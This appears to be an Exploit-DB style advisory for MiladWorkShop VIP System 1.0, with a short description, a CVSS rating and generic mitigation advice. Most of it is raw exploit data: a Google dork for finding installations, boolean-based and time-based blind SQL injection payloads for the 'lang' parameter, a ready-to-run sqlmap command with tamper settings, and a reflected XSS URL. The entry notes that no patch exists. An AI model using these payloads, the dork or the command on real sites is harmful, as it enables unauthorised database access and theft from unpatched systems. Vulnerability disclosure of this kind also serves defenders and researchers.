MiladWorkShop VIP System 1.0 - 'lang' SQL Injection

vendor:

VIP System

by:

AYADI Mohamed

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: VIP System

Affected Version From: 1.x

Affected Version To: 1.x

Patch Exists: No

Related CWE:

CPE: miladworkshop_vip_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2020

MiladWorkShop VIP System 1.0 – ‘lang’ SQL Injection

The MiladWorkShop VIP System 1.0 is vulnerable to SQL Injection in the 'lang' parameter. An attacker can exploit this vulnerability to execute arbitrary SQL queries and retrieve sensitive information.

Mitigation:

To mitigate this vulnerability, the vendor should validate and sanitize user-supplied input before using it in SQL queries. Input validation and parameterized queries can help prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection
# Google Dork: Powered By MiladWorkShop VIP System
# Date: 2020-03-03
# Exploit Author: AYADI Mohamed
# email : ayadi.mohamed@outlook.com
# Vendor Homepage: https://miladworkshop.ir/
# Software Link: https://miladworkshop.ir/vip.html
# Version: 1.x
# Tested on: Kali Linux (sqlmap)
# CVE : N/A


[ SQL injection exploitation ]

Address : http://vip.target/forget
Request Type : Post

Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lang=en AND 3-4400' OR 6146=6146-- ivGZ21=6 AND 000wM2X=000wM2X

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: lang=en AND 3' AND (SELECT 2915 FROM (SELECT(SLEEP(50)))StCO)-- vkVG21=6 AND 000wM2X=000wM2X

example :
sqlmap -u "http://vip.target/forget" --data lang=en'%20AND%203*2*1%3d6%20AND%20'000wM2X'%3d'000wM2X --random-agent --banner --ignore-prox --hex --level 3 --risk 3 --time-sec=6 --timeout 100 --tamper="between.py"


[ XSS exploitation ]
http://vip.target/%22%3E%3Cimg%20src=%22aa%22%20onerror=%22alert(1)%22%3E%3C

#creetz to all Morrocans cyber security